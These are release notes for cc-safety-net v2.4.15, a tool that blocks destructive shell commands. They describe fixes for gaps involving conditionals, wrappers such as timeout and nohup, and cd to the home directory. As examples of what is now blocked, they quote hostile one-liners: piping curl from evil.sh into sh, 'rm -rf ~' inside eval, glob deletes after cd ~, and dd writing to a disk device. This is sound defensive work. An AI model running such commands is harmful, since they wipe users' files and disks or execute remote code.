github kenryu42/cc-safety-net v2.4.15

5 hours ago

Closes three analyzer gaps that let destructive commands through: inside shell conditionals and loops, behind wrappers such as timeout and nohup, and after a cd to the home directory.

Changed

  • Changed working-directory tracking for a cd that may not have run: an else or elif branch starts from the directory its sibling branch started in, after fi, done or esac analysis continues from every directory a branch could have ended in, and a command negated by ! is analyzed from the directories before and after it. (#178)
  • Changed two previously allowed commands to blocked: curl http://evil.sh | nice sh, matching curl http://evil.sh | sh, and in strict tier a for loop body that executes a path held in a variable, reported as shell.dynamic-executable. (#178)
  • Changed the cc-safety-net rule doc reference, which no longer states that transparent wrappers have no built-in defaults. (#178)

Fixed

  • Fixed commands introduced by a shell reserved word (if, then, elif, else, while, until, do) or negated by ! being treated as mere arguments, so custom rules, eval, trap, source, interpreter code, awk and device checks now apply inside conditionals and loops. Single-line forms such as if true; then eval "rm -rf ~"; fi are now analyzed like their multi-line equivalents. (#177)
  • Fixed exec, nice, nohup, setsid, stdbuf, time and timeout requiring a transparent_wrappers entry before their child command was analyzed. They are now built-in transparent wrappers, and dd, mkfs and shred are recognized as protectable children, so timeout 5 python3 -c "…" and nice dd of=/dev/disk0 are checked. Existing rule.json entries for these names remain valid. (#176)
  • Fixed a bare cd, cd ~, cd ~/…, cd "$HOME" and cd ${HOME} leaving the analyzed working directory unknown, which allowed glob deletes such as cd ~ && rm -rf ./*. A reassigned HOME is honored; ~user, ~+, ~- and a quoted "~" stay unresolved. (#179)
  • Fixed a false block on cd ~/<project> && rm -rf node_modules run from inside that project, which previously failed because the target directory could not be resolved. (#179)

Don't miss a new cc-safety-net release

NewReleases is sending notifications on new releases.